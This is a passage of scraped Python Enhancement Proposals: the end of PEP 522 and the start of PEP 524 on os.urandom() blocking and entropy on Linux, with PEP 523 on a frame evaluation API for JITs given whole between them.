ExecStartPre=python3 -c “import secrets; secrets.wait_for_system_rng()”
Alternatively, the following snippet will use secrets.token_bytes() if
available, and fall back to os.urandom() otherwise:
try:import secrets.token_bytes as _get_random_bytes
except ImportError:import os.urandom as _get_random_bytes
Affected non-security sensitive applications
Non-security sensitive applications should be updated to use the random
module rather than os.urandom:
def pseudorandom_bytes(num_bytes):
return random.getrandbits(num_bytes*8).to_bytes(num_bytes, "little")
Depending on the details of the application, the random module may offer
other APIs that can be used directly, rather than needing to emulate the
raw byte sequence produced by the os.urandom() API.
Additional Background
Why propose this now?
The main reason is because the Python 3.5.0 release switched to using the new
Linux getrandom() syscall when available in order to avoid consuming a
file descriptor [1], and this had the side effect of making the following
operations block waiting for the system random number generator to be ready:
os.urandom (and APIs that depend on it)
importing the random module
initializing the randomized hash algorithm used by some builtin types
While the first of those behaviours is arguably desirable (and consistent with
the existing behaviour of os.urandom on other operating systems), the
latter two behaviours are unnecessary and undesirable, and the last one is now
known to cause a system level deadlock when attempting to run Python scripts
during the Linux init process with Python 3.5.0 or 3.5.1 [2], while the second
one can cause problems when using virtual machines without robust entropy
sources configured [3].
Since decoupling these behaviours in CPython will involve a number of
implementation changes more appropriate for a feature release than a maintenance
release, the relatively simple resolution applied in Python 3.5.2 was to revert
all three of them to a behaviour similar to that of previous Python versions:
if the new Linux syscall indicates it will block, then Python 3.5.2 will
implicitly fall back on reading /dev/urandom directly [4].
However, this bug report also resulted in a range of proposals to add new
APIs like os.getrandom() [5], os.urandom_block() [6],
os.pseudorandom() and os.cryptorandom() [7], or adding new optional
parameters to os.urandom() itself [8], and then attempting to educate
users on when they should call those APIs instead of just using a plain
os.urandom() call.
These proposals arguably represent overreactions, as the question of reliably
obtaining random numbers suitable for security sensitive work on Linux is a
relatively obscure problem of interest mainly to operating system developers
and embedded systems programmers, that may not justify expanding the
Python standard library’s cross-platform APIs with new Linux-specific concerns.
This is especially so with the secrets module already being added as the
“use this and don’t worry about the low level details” option for developers
writing security sensitive software that for some reason can’t rely on even
higher level domain specific APIs (like web frameworks) and also don’t need to
worry about Python versions prior to Python 3.6.
That said, it’s also the case that low cost ARM devices are becoming
increasingly prevalent, with a lot of them running Linux, and a lot of folks
writing Python applications that run on those devices. That creates an
opportunity to take an obscure security problem that currently requires a lot
of knowledge about Linux boot processes and provably unpredictable random
number generation to diagnose and resolve, and instead turn it into a
relatively mundane and easy-to-find-in-an-internet-search runtime exception.
The cross-platform behaviour of os.urandom()
On operating systems other than Linux and NetBSD, os.urandom() may already
block waiting for the operating system’s random number generator to be ready.
This will happen at most once in the lifetime of the process, and the call is
subsequently guaranteed to be non-blocking.
Linux and NetBSD are outliers in that, even when the operating system’s random
number generator doesn’t consider itself ready for use in security sensitive
operations, reading from the /dev/urandom device will return random values
based on the entropy it has available.
This behaviour is potentially problematic, so Linux 3.17 added a new
getrandom() syscall that (amongst other benefits) allows callers to
either block waiting for the random number generator to be ready, or
else request an error return if the random number generator is not ready.
Notably, the new API does not support the old behaviour of returning
data that is not suitable for security sensitive use cases.
Versions of Python prior up to and including Python 3.4 access the
Linux /dev/urandom device directly.
Python 3.5.0 and 3.5.1 (when build on a system that offered the new syscall)
called getrandom() in blocking mode in order to avoid the use of a file
descriptor to access /dev/urandom. While there were no specific problems
reported due to os.urandom() blocking in user code, there were problems
due to CPython implicitly invoking the blocking behaviour during interpreter
startup and when importing the random module.
Rather than trying to decouple SipHash initialization from the
os.urandom() implementation, Python 3.5.2 switched to calling
getrandom() in non-blocking mode, and falling back to reading from
/dev/urandom if the syscall indicates it will block.
As a result of the above, os.urandom() in all Python versions up to and
including Python 3.5 propagate the behaviour of the underling /dev/urandom
device to Python code.
Problems with the behaviour of /dev/urandom on Linux
The Python os module has largely co-evolved with Linux APIs, so having
os module functions closely follow the behaviour of their Linux operating
system level counterparts when running on Linux is typically considered to be
a desirable feature.
However, /dev/urandom represents a case where the current behaviour is
acknowledged to be problematic, but fixing it unilaterally at the kernel level
has been shown to prevent some Linux distributions from booting (at least in
part due to components like Python currently using it for
non-security-sensitive purposes early in the system initialization process).
As an analogy, consider the following two functions:
def generate_example_password():
"""Generates passwords solely for use in code examples"""
return generate_unpredictable_password()
def generate_actual_password():
"""Generates actual passwords for use in real applications"""
return generate_unpredictable_password()
If you think of an operating system’s random number generator as a method for
generating unpredictable, secret passwords, then you can think of Linux’s
/dev/urandom as being implemented like:
# Oversimplified artist's conception of the kernel code
# implementing /dev/urandom
def generate_unpredictable_password():
if system_rng_is_ready:
return use_system_rng_to_generate_password()
else:
# we can't make an unpredictable password; silently return a
# potentially predictable one instead:
return "p4ssw0rd"
In this scenario, the author of generate_example_password is fine - even if
"p4ssw0rd" shows up a bit more often than they expect, it’s only used in
examples anyway. However, the author of generate_actual_password has a
problem - how do they prove that their calls to
generate_unpredictable_password never follow the path that returns a
predictable answer?
In real life it’s slightly more complicated than this, because there
might be some level of system entropy available – so the fallback might
be more like return random.choice(["p4ssword", "passw0rd",
"p4ssw0rd"]) or something even more variable and hence only statistically
predictable with better odds than the author of generate_actual_password
was expecting. This doesn’t really make things more provably secure, though;
mostly it just means that if you try to catch the problem in the obvious way –
if returned_password == "p4ssw0rd": raise UhOh – then it doesn’t work,
because returned_password might instead be p4ssword or even
pa55word, or just an arbitrary 64 bit sequence selected from fewer than
2**64 possibilities. So this rough sketch does give the right general idea of
the consequences of the “more predictable than expected” fallback behaviour,
even though it’s thoroughly unfair to the Linux kernel team’s efforts to
mitigate the practical consequences of this problem without resorting to
breaking backwards compatibility.
This design is generally agreed to be a bad idea. As far as we can
tell, there are no use cases whatsoever in which this is the behavior
you actually want. It has led to the use of insecure ssh keys on
real systems, and many *nix-like systems (including at least Mac OS
X, OpenBSD, and FreeBSD) have modified their /dev/urandom
implementations so that they never return predictable outputs, either
by making reads block in this case, or by simply refusing to run any
userspace programs until the system RNG has been
initialized. Unfortunately, Linux has so far been unable to follow
suit, because it’s been empirically determined that enabling the
blocking behavior causes some currently extant distributions to
fail to boot.
Instead, the new getrandom() syscall was introduced, making
it possible for userspace applications to access the system random number
generator safely, without introducing hard to debug deadlock problems into
the system initialization processes of existing Linux distros.
Consequences of getrandom() availability for Python
Prior to the introduction of the getrandom() syscall, it simply wasn’t
feasible to access the Linux system random number generator in a provably
safe way, so we were forced to settle for reading from /dev/urandom as the
best available option. However, with getrandom() insisting on raising an
error or blocking rather than returning predictable data, as well as having
other advantages, it is now the recommended method for accessing the kernel
RNG on Linux, with reading /dev/urandom directly relegated to “legacy”
status. This moves Linux into the same category as other operating systems
like Windows, which doesn’t provide a /dev/urandom device at all: the
best available option for implementing os.urandom() is no longer simply
reading bytes from the /dev/urandom device.
This means that what used to be somebody else’s problem (the Linux kernel
development team’s) is now Python’s problem – given a way to detect that the
system RNG is not initialized, we have to choose how to handle this
situation whenever we try to use the system RNG.
It could simply block, as was somewhat inadvertently implemented in 3.5.0,
and as is proposed in Victor Stinner’s competing PEP:
# artist's impression of the CPython 3.5.0-3.5.1 behavior
def generate_unpredictable_bytes_or_block(num_bytes):
while not system_rng_is_ready:
wait
return unpredictable_bytes(num_bytes)
Or it could raise an error, as this PEP proposes (in some cases):
# artist's impression of the behavior proposed in this PEP
def generate_unpredictable_bytes_or_raise(num_bytes):
if system_rng_is_ready:
return unpredictable_bytes(num_bytes)
else:
raise BlockingIOError
Or it could explicitly emulate the /dev/urandom fallback behavior,
as was implemented in 3.5.2rc1 and is expected to remain for the rest
of the 3.5.x cycle:
# artist's impression of the CPython 3.5.2rc1+ behavior
def generate_unpredictable_bytes_or_maybe_not(num_bytes):
if system_rng_is_ready:
return unpredictable_bytes(num_bytes)
else:
return (b"p4ssw0rd" * (num_bytes // 8 + 1))[:num_bytes]
(And the same caveats apply to this sketch as applied to the
generate_unpredictable_password sketch of /dev/urandom above.)
There are five places where CPython and the standard library attempt to use the
operating system’s random number generator, and thus five places where this
decision has to be made:
initializing the SipHash used to protect str.__hash__ and
friends against DoS attacks (called unconditionally at startup)
initializing the random module (called when random is
imported)
servicing user calls to the os.urandom public API
the higher level random.SystemRandom public API
the new secrets module public API added by PEP 506
Previously, these five places all used the same underlying code, and
thus made this decision in the same way.
This whole problem was first noticed because 3.5.0 switched that
underlying code to the generate_unpredictable_bytes_or_block behavior,
and it turns out that there are some rare cases where Linux boot
scripts attempted to run a Python program as part of system initialization, the
Python startup sequence blocked while trying to initialize SipHash,
and then this triggered a deadlock because the system stopped doing
anything – including gathering new entropy – until the Python script
was forcibly terminated by an external timer. This is particularly unfortunate
since the scripts in question never processed untrusted input, so there was no
need for SipHash to be initialized with provably unpredictable random data in
the first place. This motivated the change in 3.5.2rc1 to emulate the old
/dev/urandom behavior in all cases (by calling getrandom() in
non-blocking mode, and then falling back to reading /dev/urandom
if the syscall indicates that the /dev/urandom pool is not yet
fully initialized.)
We don’t know whether such problems may also exist in the Fedora/RHEL/CentOS
ecosystem, as the build systems for those distributions use chroots on servers
running an older operating system kernel that doesn’t offer the getrandom()
syscall, which means CPython’s current build configuration compiles out the
runtime check for that syscall [10].
A similar problem was found due to the random module calling
os.urandom as a side-effect of import in order to seed the default
global random.Random() instance.
We have not received any specific complaints regarding direct calls to
os.urandom() or random.SystemRandom() blocking with 3.5.0 or 3.5.1 -
only problem reports due to the implicit blocking on interpreter startup and
as a side-effect of importing the random module.
Independently of this PEP, the first two cases have already been updated to
never block, regardless of the behaviour of os.urandom().
Where PEP 524 proposes to make all 3 of the latter cases block implicitly,
this PEP proposes that approach only for the last case (the secrets)
module, with os.urandom() and random.SystemRandom() instead raising
an exception when they detect that the underlying operating system call
would block.
References
[1]
os.urandom() should use Linux 3.17 getrandom() syscall
(http://bugs.python.org/issue22181)
[2]
Python 3.5 running on Linux kernel 3.17+ can block at startup or on
importing the random module on getrandom()
(http://bugs.python.org/issue26839)
[3]
“import random” blocks on entropy collection on Linux with low entropy
(http://bugs.python.org/issue25420)
[4]
os.urandom() doesn’t block on Linux anymore
(https://hg.python.org/cpython/rev/9de508dc4837)
[5]
Proposal to add os.getrandom()
(http://bugs.python.org/issue26839#msg267803)
[6]
Add os.urandom_block()
(http://bugs.python.org/issue27250)
[7]
Add random.cryptorandom() and random.pseudorandom, deprecate os.urandom()
(http://bugs.python.org/issue27279)
[8]
Always use getrandom() in os.random() on Linux and add
block=False parameter to os.urandom()
(http://bugs.python.org/issue27266)
[9]
Application level vs library level design decisions
(https://mail.python.org/pipermail/security-sig/2016-June/000057.html)
[10]
Does the HAVE_GETRANDOM_SYSCALL config setting make sense?
(https://mail.python.org/pipermail/security-sig/2016-June/000060.html)
[11]
Take a decision for os.urandom() in Python 3.6
(https://mail.python.org/pipermail/security-sig/2016-August/000084.htm)
For additional background details beyond those captured in this PEP and Victor’s
competing PEP, also see Victor’s prior collection of relevant information and
links at https://haypo-notes.readthedocs.io/summary_python_random_issue.html
Copyright
This document has been placed into the public domain.
| Rejected | PEP 522 – Allow BlockingIOError in security sensitive APIs | Standards Track | A number of APIs in the standard library that return random values nominally
suitable for use in security sensitive operations currently have an obscure
operating system dependent failure mode that allows them to return values that
are not, in fact, suitable for such operations. |
PEP 523 – Adding a frame evaluation API to CPython
Author:
Brett Cannon <brett at python.org>,
Dino Viehland <dinov at microsoft.com>
Status:
Final
Type:
Standards Track
Created:
16-May-2016
Python-Version:
3.6
Post-History:
16-May-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Proposal
Expanding PyCodeObject
Expanding PyInterpreterState
Changes to Python/ceval.c
Updating python-gdb.py
Performance impact
Example Usage
A JIT for CPython
Pyjion
Other JITs
Debugging
Implementation
Open Issues
Allow eval_frame to be NULL
Rejected Ideas
A JIT-specific C API
Is co_extra needed?
References
Copyright
Abstract
This PEP proposes to expand CPython’s C API [2] to allow for
the specification of a per-interpreter function pointer to handle the
evaluation of frames [5]. This proposal also
suggests adding a new field to code objects [3] to store
arbitrary data for use by the frame evaluation function.
Rationale
One place where flexibility has been lacking in Python is in the direct
execution of Python code. While CPython’s C API [2] allows for
constructing the data going into a frame object and then evaluating it
via PyEval_EvalFrameEx() [5], control over the
execution of Python code comes down to individual objects instead of a
holistic control of execution at the frame level.
While wanting to have influence over frame evaluation may seem a bit
too low-level, it does open the possibility for things such as a
method-level JIT to be introduced into CPython without CPython itself
having to provide one. By allowing external C code to control frame
evaluation, a JIT can participate in the execution of Python code at
the key point where evaluation occurs. This then allows for a JIT to
conditionally recompile Python bytecode to machine code as desired
while still allowing for executing regular CPython bytecode when
running the JIT is not desired. This can be accomplished by allowing
interpreters to specify what function to call to evaluate a frame. And
by placing the API at the frame evaluation level it allows for a
complete view of the execution environment of the code for the JIT.
This ability to specify a frame evaluation function also allows for
other use-cases beyond just opening CPython up to a JIT. For instance,
it would not be difficult to implement a tracing or profiling function
at the call level with this API. While CPython does provide the
ability to set a tracing or profiling function at the Python level,
this would be able to match the data collection of the profiler and
quite possibly be faster for tracing by simply skipping per-line
tracing support.
It also opens up the possibility of debugging where the frame
evaluation function only performs special debugging work when it
detects it is about to execute a specific code object. In that
instance the bytecode could be theoretically rewritten in-place to
inject a breakpoint function call at the proper point for help in
debugging while not having to do a heavy-handed approach as
required by sys.settrace().
To help facilitate these use-cases, we are also proposing the adding
of a “scratch space” on code objects via a new field. This will allow
per-code object data to be stored with the code object itself for easy
retrieval by the frame evaluation function as necessary. The field
itself will simply be a PyObject * type so that any data stored in
the field will participate in normal object memory management.
Proposal
All proposed C API changes below will not be part of the stable ABI.
Expanding PyCodeObject
One field is to be added to the PyCodeObject struct
[3]:
typedef struct {
...
void *co_extra; /* "Scratch space" for the code object. */
} PyCodeObject;
The co_extra will be NULL by default and only filled in as
needed. Values stored in the field are expected to not be required
in order for the code object to function, allowing the loss of the
data of the field to be acceptable.
A private API has been introduced to work with the field:
PyAPI_FUNC(Py_ssize_t) _PyEval_RequestCodeExtraIndex(freefunc);
PyAPI_FUNC(int) _PyCode_GetExtra(PyObject *code, Py_ssize_t index,
void **extra);
PyAPI_FUNC(int) _PyCode_SetExtra(PyObject *code, Py_ssize_t index,
void *extra);
Users of the field are expected to call
_PyEval_RequestCodeExtraIndex() to receive (what should be
considered) an opaque index value to adding data into co-extra.
With that index, users can set data using _PyCode_SetExtra() and
later retrieve the data with _PyCode_GetExtra(). The API is
purposefully listed as private to communicate the fact that there are
no semantic guarantees of the API between Python releases.
Using a list and tuple were considered but was found to be less
performant, and with a key use-case being JIT usage the performance
consideration won out for using a custom struct instead of a Python
object.
A dict was also considered, but once again performance was more
important. While a dict will have constant overhead in looking up
data, the overhead for the common case of a single object being stored
in the data structure leads to a tuple having better performance
characteristics (i.e. iterating a tuple of length 1 is faster than
the overhead of hashing and looking up an object in a dict).
Expanding PyInterpreterState
The entrypoint for the frame evaluation function is per-interpreter:
// Same type signature as PyEval_EvalFrameEx().
typedef PyObject* (*_PyFrameEvalFunction)(PyFrameObject*, int);
typedef struct {
...
_PyFrameEvalFunction eval_frame;
} PyInterpreterState;
By default, the eval_frame field will be initialized to a function
pointer that represents what PyEval_EvalFrameEx() currently is
(called _PyEval_EvalFrameDefault(), discussed later in this PEP).
Third-party code may then set their own frame evaluation function
instead to control the execution of Python code. A pointer comparison
can be used to detect if the field is set to
_PyEval_EvalFrameDefault() and thus has not been mutated yet.
Changes to Python/ceval.c
PyEval_EvalFrameEx() [5] as it currently stands
will be renamed to _PyEval_EvalFrameDefault(). The new
PyEval_EvalFrameEx() will then become:
PyObject *
PyEval_EvalFrameEx(PyFrameObject *frame, int throwflag)
{
PyThreadState *tstate = PyThreadState_GET();
return tstate->interp->eval_frame(frame, throwflag);
}
This allows third-party code to place themselves directly in the path
of Python code execution while being backwards-compatible with code
already using the pre-existing C API.
Updating python-gdb.py
The generated python-gdb.py file used for Python support in GDB
makes some hard-coded assumptions about PyEval_EvalFrameEx(), e.g.
the names of local variables. It will need to be updated to work with
the proposed changes.
Performance impact
As this PEP is proposing an API to add pluggability, performance
impact is considered only in the case where no third-party code has
made any changes.
Several runs of pybench [14] consistently showed no performance
cost from the API change alone.
A run of the Python benchmark suite [9] showed no
measurable cost in performance.
In terms of memory impact, since there are typically not many CPython
interpreters executing in a single process that means the impact of
co_extra being added to PyCodeObject is the only worry.
According to [8], a run of the Python test suite
results in about 72,395 code objects being created. On a 64-bit
CPU that would result in 579,160 bytes of extra memory being used if
all code objects were alive at once and had nothing set in their
co_extra fields.
Example Usage
A JIT for CPython
Pyjion
The Pyjion project [1] has used this proposed API to implement
a JIT for CPython using the CoreCLR’s JIT [4]. Each code
object has its co_extra field set to a PyjionJittedCode object
which stores four pieces of information:
Execution count
A boolean representing whether a previous attempt to JIT failed
A function pointer to a trampoline (which can be type tracing or not)
A void pointer to any JIT-compiled machine code
The frame evaluation function has (roughly) the following algorithm:
def eval_frame(frame, throw_flag):
pyjion_code = frame.code.co_extra
if not pyjion_code:
frame.code.co_extra = PyjionJittedCode()
elif not pyjion_code.jit_failed:
if not pyjion_code.jit_code:
return pyjion_code.eval(pyjion_code.jit_code, frame)
elif pyjion_code.exec_count > 20_000:
if jit_compile(frame):
return pyjion_code.eval(pyjion_code.jit_code, frame)
else:
pyjion_code.jit_failed = True
pyjion_code.exec_count += 1
return _PyEval_EvalFrameDefault(frame, throw_flag)
The key point, though, is that all of this work and logic is separate
from CPython and yet with the proposed API changes it is able to
provide a JIT that is compliant with Python semantics (as of this
writing, performance is almost equivalent to CPython without the new
API). This means there’s nothing technically preventing others from
implementing their own JITs for CPython by utilizing the proposed API.
Other JITs
It should be mentioned that the Pyston team was consulted on an
earlier version of this PEP that was more JIT-specific and they were
not interested in utilizing the changes proposed because they want
control over memory layout they had no interest in directly supporting
CPython itself. An informal discussion with a developer on the PyPy
team led to a similar comment.
Numba [6], on the other hand, suggested that they would be
interested in the proposed change in a post-1.0 future for
themselves [7].
The experimental Coconut JIT [13] could have benefitted from
this PEP. In private conversations with Coconut’s creator we were told
that our API was probably superior to the one they developed for
Coconut to add JIT support to CPython.
Debugging
In conversations with the Python Tools for Visual Studio team (PTVS)
[12], they thought they would find these API changes useful for
implementing more performant debugging. As mentioned in the Rationale
section, this API would allow for switching on debugging functionality
only in frames where it is needed. This could allow for either
skipping information that sys.settrace() normally provides and
even go as far as to dynamically rewrite bytecode prior to execution
to inject e.g. breakpoints in the bytecode.
It also turns out that Google provides a very similar API
internally. It has been used for performant debugging purposes.
Implementation
A set of patches implementing the proposed API is available through
the Pyjion project [1]. In its current form it has more
changes to CPython than just this proposed API, but that is for ease
of development instead of strict requirements to accomplish its goals.
Open Issues
Allow eval_frame to be NULL
Currently the frame evaluation function is expected to always be set.
It could very easily simply default to NULL instead which would
signal to use _PyEval_EvalFrameDefault(). The current proposal of
not special-casing the field seemed the most straightforward, but it
does require that the field not accidentally be cleared, else a crash
may occur.
Rejected Ideas
A JIT-specific C API
Originally this PEP was going to propose a much larger API change
which was more JIT-specific. After soliciting feedback from the Numba
team [6], though, it became clear that the API was unnecessarily
large. The realization was made that all that was truly needed was the
opportunity to provide a trampoline function to handle execution of
Python code that had been JIT-compiled and a way to attach that
compiled machine code along with other critical data to the
corresponding Python code object. Once it was shown that there was no
loss in functionality or in performance while minimizing the API
changes required, the proposal was changed to its current form.
Is co_extra needed?
While discussing this PEP at PyCon US 2016, some core developers
expressed their worry of the co_extra field making code objects
mutable. The thinking seemed to be that having a field that was
mutated after the creation of the code object made the object seem
mutable, even though no other aspect of code objects changed.
The view of this PEP is that the co_extra field doesn’t change the
fact that code objects are immutable. The field is specified in this
PEP to not contain information required to make the code object
usable, making it more of a caching field. It could be viewed as
similar to the UTF-8 cache that string objects have internally;
strings are still considered immutable even though they have a field
that is conditionally set.
Performance measurements were also made where the field was not
available for JIT workloads. The loss of the field was deemed too
costly to performance when using an unordered map from C++ or Python’s
dict to associated a code object with JIT-specific data objects.
References
[1] (1, 2)
Pyjion project
(https://github.com/microsoft/pyjion)
[2] (1, 2)
CPython’s C API
(https://docs.python.org/3/c-api/index.html)
[3] (1, 2)
PyCodeObject
(https://docs.python.org/3/c-api/code.html#c.PyCodeObject)
[4]
.NET Core Runtime (CoreCLR)
(https://github.com/dotnet/coreclr)
[5] (1, 2, 3)
PyEval_EvalFrameEx()
(https://docs.python.org/3/c-api/veryhigh.html?highlight=pyframeobject#c.PyEval_EvalFrameEx)
[6] (1, 2)
Numba
(http://numba.pydata.org/)
[7]
numba-users mailing list:
“Would the C API for a JIT entrypoint being proposed by Pyjion help out Numba?”
(https://groups.google.com/a/continuum.io/forum/#!topic/numba-users/yRl_0t8-m1g)
[8]
[Python-Dev] Opcode cache in ceval loop
(https://mail.python.org/pipermail/python-dev/2016-February/143025.html)
[9]
Python benchmark suite
(https://hg.python.org/benchmarks)
[10]
Pyston
(http://pyston.org)
[11]
PyPy
(http://pypy.org/)
[12]
Python Tools for Visual Studio
(http://microsoft.github.io/PTVS/)
[13]
Coconut
(https://github.com/davidmalcolm/coconut)
[14]
pybench
(https://hg.python.org/cpython/file/default/Tools/pybench)
Copyright
This document has been placed in the public domain.
| Final | PEP 523 – Adding a frame evaluation API to CPython | Standards Track | This PEP proposes to expand CPython’s C API [2] to allow for
the specification of a per-interpreter function pointer to handle the
evaluation of frames [5]. This proposal also
suggests adding a new field to code objects [3] to store
arbitrary data for use by the frame evaluation function. |
PEP 524 – Make os.urandom() blocking on Linux
Author:
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Standards Track
Created:
20-Jun-2016
Python-Version:
3.6
Table of Contents
Abstract
The bug
Original bug
Status in Python 3.5.2
Use Cases
Use Case 1: init script
Use case 1.1: No secret needed
Use case 1.2: Secure secret required
Use Case 2: Web server
Fix system urandom
Load entropy from disk at boot
Virtual machines
Embedded devices
Denial-of-service when reading random
Don’t use /dev/random but /dev/urandom
getrandom(size, 0) can block forever on Linux
Rationale
Changes
Make os.urandom() blocking on Linux
Add a new os.getrandom() function
Examples using os.getrandom()
Best-effort RNG
wait_for_system_rng()
Create a best-effort RNG
Alternative
Leave os.urandom() unchanged, add os.getrandom()
Raise BlockingIOError in os.urandom()
Proposition
Criticism
Add an optional block parameter to os.urandom()
Acceptance
Annexes
Operating system random functions
Why using os.urandom()?
Copyright
Abstract
Modify os.urandom() to block on Linux 3.17 and newer until the OS
urandom is initialized to increase the security.
Add also a new os.getrandom() function (for Linux and Solaris) to be
able to choose how to handle when os.urandom() is going to block on
Linux.
The bug
Original bug
Python 3.5.0 was enhanced to use the new getrandom() syscall
introduced in Linux 3.17 and Solaris 11.3. The problem is that users
started to complain that Python 3.5 blocks at startup on Linux in
virtual machines and embedded devices: see issues #25420 and #26839.
On Linux, getrandom(0) blocks until the kernel initialized urandom
with 128 bits of entropy. The issue #25420 describes a Linux build
platform blocking at import random. The issue #26839 describes a
short Python script used to compute a MD5 hash, systemd-cron, script
called very early in the init process. The system initialization blocks
on this script which blocks on getrandom(0) to initialize Python.
The Python initialization requires random bytes to implement a
counter-measure against the hash denial-of-service (hash DoS), see:
Issue #13703: Hash collision security issue
PEP 456: Secure and interchangeable hash algorithm
Importing the random module creates an instance of
random.Random: random._inst. On Python 3.5, random.Random
constructor reads 2500 bytes from os.urandom() to seed a Mersenne
Twister RNG (random number generator).
Other platforms may be affected by this bug, but in practice, only Linux
systems use Python scripts to initialize the system.
Status in Python 3.5.2
Python 3.5.2 behaves like Python 2.7 and Python 3.4. If the system
urandom is not initialized, the startup does not block, but
os.urandom() can return low-quality entropy (even it is not easily
guessable).
Use Cases
The following use cases are used to help to choose the right compromise
between security and practicability.
Use Case 1: init script
Use a Python 3 script to initialize the system, like systemd-cron. If
the script blocks, the system initialize is stuck too. The issue #26839
is a good example of this use case.
Use case 1.1: No secret needed
If the init script doesn’t have to generate any secure secret, this use
case is already handled correctly in Python 3.5.2: Python startup
doesn’t block on system urandom anymore.
Use case 1.2: Secure secret required
If the init script has to generate a secure secret, there is no safe
solution.
Falling back to weak entropy is not acceptable, it would
reduce the security of the program.
Python cannot produce itself secure entropy, it can only wait until
system urandom is initialized. But in this use case, the whole system
initialization is blocked by this script, so the system fails to boot.
The real answer is that the system initialization must not be blocked by
such script. It is ok to start the script very early at system
initialization, but the script may blocked a few seconds until it is
able to generate the secret.
Reminder: in some cases, the initialization of the system urandom never
occurs and so programs waiting for system urandom blocks forever.
Use Case 2: Web server
Run a Python 3 web server serving web pages using HTTP and HTTPS
protocols. The server is started as soon as possible.
The first target of the hash DoS attack was web server: it’s important
that the hash secret cannot be easily guessed by an attacker.
If serving a web page needs a secret to create a cookie, create an
encryption key, …, the secret must be created with good entropy:
again, it must be hard to guess the secret.
A web server requires security. If a choice must be made between
security and running the server with weak entropy, security is more
important. If there is no good entropy: the server must block or fail
with an error.
The question is if it makes sense to start a web server on a host before
system urandom is initialized.
The issues #25420 and #26839 are restricted to the Python startup, not
to generate a secret before the system urandom is initialized.
Fix system urandom
Load entropy from disk at boot
Collecting entropy can take up to several minutes. To accelerate the
system initialization, operating systems store entropy on disk at
shutdown, and then reload entropy from disk at the boot.
If a system collects enough entropy at least once, the system urandom
will be initialized quickly, as soon as the entropy is reloaded from
disk.
Virtual machines
Virtual machines don’t have a direct access to the hardware and so have
less sources of entropy than bare metal. A solution is to add a
virtio-rng device to pass entropy
from the host to the virtual machine.
Embedded devices
A solution for embedded devices is to plug an hardware RNG.
For example, Raspberry Pi have an hardware RNG but it’s not used by
default. See: Hardware RNG on Raspberry Pi.
Denial-of-service when reading random
Don’t use /dev/random but /dev/urandom
The /dev/random device should only used for very specific use cases.
Reading from /dev/random on Linux is likely to block. Users don’t
like when an application blocks longer than 5 seconds to generate a
secret. It is only expected for specific cases like generating
explicitly an encryption key.
When the system has no available entropy, choosing between blocking
until entropy is available or falling back on lower quality entropy is a
matter of compromise between security and practicability. The choice
depends on the use case.
On Linux, /dev/urandom is secure, it should be used instead of
/dev/random. See Myths about /dev/urandom by Thomas Hühn: “Fact:
/dev/urandom is the preferred source of cryptographic randomness on
UNIX-like systems”
getrandom(size, 0) can block forever on Linux
The origin of the Python issue #26839 is the Debian bug
report #822431: in fact,
getrandom(size, 0) blocks forever on the virtual machine. The system
succeeded to boot because systemd killed the blocked process after 90
seconds.
Solutions like Load entropy from disk at boot reduces the risk of
this bug.
Rationale
On Linux, reading the /dev/urandom can return “weak” entropy before
urandom is fully initialized, before the kernel collected 128 bits of
entropy. Linux 3.17 adds a new getrandom() syscall which allows to
block until urandom is initialized.
On Python 3.5.2, os.urandom() uses the
getrandom(size, GRND_NONBLOCK), but falls back on reading the
non-blocking /dev/urandom if getrandom(size, GRND_NONBLOCK)
fails with EAGAIN.
Security experts promotes os.urandom() to generate cryptographic
keys because it is implemented with a Cryptographically secure
pseudo-random number generator (CSPRNG).
By the way, os.urandom() is preferred over ssl.RAND_bytes() for
different reasons.
This PEP proposes to modify os.urandom() to use getrandom() in
blocking mode to not return weak entropy, but also ensure that Python
will not block at startup.
Changes
Make os.urandom() blocking on Linux
All changes described in this section are specific to the Linux
platform.
Changes:
Modify os.urandom() to block until system urandom is initialized:
os.urandom() (C function _PyOS_URandom()) is modified to
always call getrandom(size, 0) (blocking mode) on Linux and
Solaris.
Add a new private _PyOS_URandom_Nonblocking() function: try to
call getrandom(size, GRND_NONBLOCK) on Linux and Solaris, but
falls back on reading /dev/urandom if it fails with EAGAIN.
Initialize hash secret from non-blocking system urandom:
_PyRandom_Init() is modified to call
_PyOS_URandom_Nonblocking().
random.Random constructor now uses non-blocking system urandom: it
is modified to use internally the new _PyOS_URandom_Nonblocking()
function to seed the RNG.
Add a new os.getrandom() function
A new os.getrandom(size, flags=0) function is added: use
getrandom() syscall on Linux and getrandom() C function on
Solaris.
The function comes with 2 new flags:
os.GRND_RANDOM: read bytes from /dev/random rather than
reading /dev/urandom
os.GRND_NONBLOCK: raise a BlockingIOError if os.getrandom()
would block
The os.getrandom() is a thin wrapper on the getrandom()
syscall/C function and so inherit of its behaviour. For example, on
Linux, it can return less bytes than requested if the syscall is
interrupted by a signal.
Examples using os.getrandom()
Best-effort RNG
Example of a portable non-blocking RNG function: try to get random bytes
from the OS urandom, or fallback on the random module.
def best_effort_rng(size):
# getrandom() is only available on Linux and Solaris
if not hasattr(os, 'getrandom'):
return os.urandom(size)
result = bytearray()
try:
# need a loop because getrandom() can return less bytes than
# requested for different reasons
while size:
data = os.getrandom(size, os.GRND_NONBLOCK)
result += data
size -= len(data)
except BlockingIOError:
# OS urandom is not initialized yet:
# fallback on the Python random module
data = bytes(random.randrange(256) for byte in range(size))
result += data
return bytes(result)
This function can block in theory on a platform where
os.getrandom() is not available but os.urandom() can block.
wait_for_system_rng()
Example of function waiting timeout seconds until the OS urandom is
initialized on Linux or Solaris:
def wait_for_system_rng(timeout, interval=1.0):
if not hasattr(os, 'getrandom'):
return
deadline = time.monotonic() + timeout
while True:
try:
os.getrandom(1, os.GRND_NONBLOCK)
except BlockingIOError:
pass
else:
return
if time.monotonic() > deadline:
raise Exception('OS urandom not initialized after %s seconds'
% timeout)
time.sleep(interval)
This function is not portable. For example, os.urandom() can block
on FreeBSD in theory, at the early stage of the system initialization.
Create a best-effort RNG
Simpler example to create a non-blocking RNG on Linux: choose between
Random.SystemRandom and Random.Random depending if
getrandom(size) would block.
def create_nonblocking_random():
if not hasattr(os, 'getrandom'):
return random.Random()
try:
os.getrandom(1, os.GRND_NONBLOCK)
except BlockingIOError:
return random.Random()
else:
return random.SystemRandom()
This function is not portable. For example, random.SystemRandom
can block on FreeBSD in theory, at the early stage of the system
initialization.
Alternative
Leave os.urandom() unchanged, add os.getrandom()
os.urandom() remains unchanged: never block, but it can return weak
entropy if system urandom is not initialized yet.
Only add the new os.getrandom() function (wrapper to the
getrandom() syscall/C function).
The secrets.token_bytes() function should be used to write portable
